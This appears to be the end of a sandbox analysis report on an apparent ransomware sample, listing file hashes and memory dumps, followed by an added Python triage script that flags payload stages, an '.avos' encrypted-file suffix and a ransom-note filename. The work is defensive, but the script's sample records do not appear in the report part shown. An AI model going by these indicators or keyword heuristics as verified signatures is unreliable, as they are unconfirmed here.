| SHA256 | 34390e6f6a5ec47700d7260034d6b4ad4ff27f87b6d1ce52770f03ba718fd2bc |
| SHA512 | 84aef4f8d9fe1ffe614faccc690bccf15b83fbb685dcac87f86fbaf19c6fef13b1b7e569ecc67e864f828eecf2d9318fc1445716618191f01bba61af90587d37 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c62c553083980b1f3ffc1594b6ed62d3 |
| SHA1 | 55582b0155862d25db328d44a5d49e3acf781302 |
| SHA256 | f7dfbed31834054f439828379586e33b754ef844b34f27d9b85da7350277dea8 |
| SHA512 | 548a5f36b4974fdca022f520ddd6a0cd460c28b361a0718d3bece6f6db758905fff7bf65728e411d40ec92c2fcb06335be14f227678ce0348650efa7979e707f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 131054ae42ec95352c793189c11a7c25 |
| SHA1 | 2b47906ee9c7ab6b30e8be73ab6a3f86de340826 |
| SHA256 | 70686afa7d17cde77b987ca8c362fc24bd8729a6fa4cbf3c6441c64e564250ba |
| SHA512 | 6e6392b265d0acd49bdf7d45ddf3e0e8d00f68186c605179d5a82894b1fc1b206a88ef9ddc42640d523726e75dbacd71e78a706173e28ca5fc1555144e20c2ac |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c9e13106c0df67f2dfd7422377a74a9f |
| SHA1 | b97738c0030b1f73178f772bd471b3c257970b30 |
| SHA256 | 9d4df24ef0019f683b114738196b0a19be76396a7950a7f962eda74a2c8cdc56 |
| SHA512 | 66674fef7d577bc67d72e41d25485775cb0937dcfbe2644adf4b7de05a180d9de4116c5bf5b954ad2b8290e0b7050cc8999b65bb5f1b6c35b177d0f4318f7633 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f41eb055bb4ff5d650717cfb6d0b9a0b |
| SHA1 | 0aeeca1cbde1fdebad8eaaf19cb6a76b71641927 |
| SHA256 | 503c38cca2570e0e9d91985f9255d51de23a9060526f17f3ba3e5ddc0e817b77 |
| SHA512 | 0740d2fa3b5e29780ad22c98e534209385f66451d248e10f6f2e6c13328e40b767983f03c1d2b3fc768939887be77eae61bea4402818570afb874f31f96b8598 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f59d7ac1ecdad9e9b1ca12aa3deeac0d |
| SHA1 | a75b30945e3a2d92c9fa1ed4cb66e613c2cd303a |
| SHA256 | 97c15ea73fe93c81846c1f43433e336b6f1cfd9a88168350b03f5b1b97ef5ecf |
| SHA512 | 45b845a3e981de0e2dfcdb81cf1c56ec1287b96092500cb2363e5e2c6b337a22025a421fcddcbbb384ae35ee908e21fdb702bf6da0aa7ea077a5b1b03dc173b6 |
C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.cfg
| MD5 | 904eaad00901f98cdf00b7c910139a7f |
| SHA1 | 9a49fa7da54f9372f5ecb287ae325d1f51b9c376 |
| SHA256 | 1c1b57f22a38567a6f9b75086f703544d73bb6cafed06bdbcd9e4250cdb84e50 |
| SHA512 | 63d701a4d7b7dcdc565ad42278f43339833b4ab71cbc93b53a90a6bd85fdb6e94b5caeba1549f076bd18f4041345e6c3e7847583ff27b8859555ae9d64b996e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | efdf336c3d3a1adb92b2ad84b9e0ddf8 |
| SHA1 | d12684bf46d8efdc7fe65d72974a64f8cfc83aae |
| SHA256 | a3b64fe67ea4be6fd1cad4f43ab347f08f3c05afd11552101ddc5f80fd3e31cc |
| SHA512 | d47956132f95e0f8c31b0d8e8b23a7748b4fd39b6acf746e65600499bb6dac8bf3ba64843a090e41066de86eadd02aeb9c1ebd3ab9cdee4bd9d7867febbb696e |
memory/244-3008-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3010-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3009-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3011-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3012-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3013-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp
memory/244-3014-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp
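The dropped-file listing above is raw sandbox output: hundreds of hash rows, most of them Chrome and Edge profile churn, with the artefacts an analyst actually pivots on (the two stages named after their own SHA256, the `.avos` suffix appended to UndoExport.pdf, the GET_YOUR_FILES_BACK.txt note in C:\Recovery) buried among them. The following Python is an added example, not part of this report or of the sandbox vendor's tooling. It parses the path / MD5 / SHA1 / SHA256 / SHA512 layout used here (including the interleaved `memory/...-memory.dmp` entries), validates digest lengths, discards browser-profile noise, and flags the ransomware indicators. The noise directories, extension sets and ransom-note keywords are my heuristics, not anything the report defines; the embedded sample is six records copied from this page with their SHA512 rows omitted.

```python
"""Triage the dropped-file records of a sandbox report laid out as above
(path line, then MD5/SHA1/SHA256/SHA512 rows, interleaved with memory dumps):
drop browser-profile churn, list executable payloads with SHA256 for pivoting,
and flag ransomware indicators (appended extension, ransom-note name)."""
import re
from collections import Counter
from dataclasses import dataclass, field

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_DUMP = re.compile(r"^memory/(\d+)-\d+-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
NOISE_DIRS = ("\\google\\chrome\\user data\\", "\\microsoft\\edge\\user data\\")  # heuristic
EXEC_EXT = {".exe", ".dll", ".js", ".vbs", ".ps1", ".bat", ".hta", ".scr"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".pptx", ".jpg", ".png", ".txt", ".zip"}
NOTE_WORDS = ("FILES", "RECOVER", "DECRYPT", "README", "RESTORE")  # heuristic, not a signature

# Constructed input: six records copied from this report, SHA512 rows omitted.
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8967d378c88f147a3efd5ca48db576ba |
| SHA1 | 0845eccf61071d85cfdd9247b77086eb8184d8d2 |
| SHA256 | 080ee9a8f5f2ff89185a633b2a43d70e2518481baeb80d03d05d979cde5903e5 |
C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js
| MD5 | 68de20eb910a17ccdb1b6c37ac214491 |
| SHA1 | 4db1e2812bca58b73b4a9162c2fe5f8df8fc2a78 |
| SHA256 | 3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b |
memory/748-1297-0x00000249DBB30000-0x00000249DBBB6000-memory.dmp
C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe
| MD5 | 76e177a94834b3f7c63257bc8011f60f |
| SHA1 | e2bdef45d8dd4b1811396781b0bc94092d268a88 |
| SHA256 | fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f |
C:\Recovery\GET_YOUR_FILES_BACK.txt
| MD5 | 5f379e8e4834e0318a4d32cc0694c25e |
| SHA1 | 46a05816fa412f576c695f33e1c876287e2cc939 |
| SHA256 | daafd23150d97b38e7478711b69934e662d532083ba10392b5329c4829330eb5 |
C:\Users\Admin\Downloads\UndoExport.pdf.avos
| MD5 | 52a8a69a3250ef0dab7a485de4f6ea50 |
| SHA1 | 19ba22c62213be3b366807ea24f76a9893ac8a0c |
| SHA256 | 689ff825e8c524971585af7bb9cdbaba2068d30350952f4ff743434ab95ff7b5 |
C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe
| MD5 | 3f44dd7f287da4a9a1be82e5178b7dc8 |
| SHA1 | 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9 |
| SHA256 | e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225 |
"""


@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)
    bad_hashes: list = field(default_factory=list)  # algos whose digest had the wrong length

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1]


def parse_records(text):
    """Attach each hash row to the preceding path; memory dumps become (pid, base, size)."""
    files, regions, cur = [], [], None
    for line in filter(None, map(str.strip, text.splitlines())):
        if m := HASH_ROW.match(line):
            if cur is None:                  # orphan hash row, nothing to attach it to
                continue
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) == HASH_LEN[algo]:
                cur.hashes[algo] = digest
            else:
                cur.bad_hashes.append(algo)  # truncated or garbled digest
        elif m := MEM_DUMP.match(line):
            pid, start, end = (int(g, b) for g, b in zip(m.groups(), (10, 16, 16)))
            regions.append((pid, start, end - start))
            cur = None                       # a dump line carries no hash rows
        else:
            cur = FileRecord(line)
            files.append(cur)
    return files, regions


def triage(files):
    """Drop browser-profile churn, list payloads for pivoting, flag ransomware indicators."""
    out = {"noise": 0, "payloads": [], "ransom_notes": [], "appended_ext": Counter(), "malformed": []}
    for f in files:
        if f.bad_hashes:
            out["malformed"].append(f.path)
        if any(d in f.path.lower() for d in NOISE_DIRS):
            out["noise"] += 1
            continue
        parts = f.name.lower().split(".")
        ext = "." + parts[-1] if len(parts) > 1 else ""
        inner = "." + parts[-2] if len(parts) > 2 else ""
        if ext in EXEC_EXT:
            out["payloads"].append({"path": f.path, "sha256": f.hashes.get("SHA256"),
                                    # stage named after its own hash: typical of a fetched sample
                                    "named_by_own_hash": parts[-2] == f.hashes.get("SHA256")})
        elif inner in DOC_EXT and ext not in DOC_EXT | EXEC_EXT:
            out["appended_ext"][ext] += 1    # ".pdf.avos" -> ".avos": encrypted-file suffix
        if ext == ".txt" and any(w in f.name.upper() for w in NOTE_WORDS):
            out["ransom_notes"].append(f.path)
    return out


if __name__ == "__main__":
    files, regions = parse_records(SAMPLE_REPORT)
    print(triage(files), regions)
```

Run it as-is to see the summary for the embedded records, or feed `parse_records` the full listing saved from the report. The appended-extension check is deliberately generic: it counts any suffix sitting behind a known document extension, so it reports `.avos` here without the suffix being hard-coded, and would report a different family's suffix the same way.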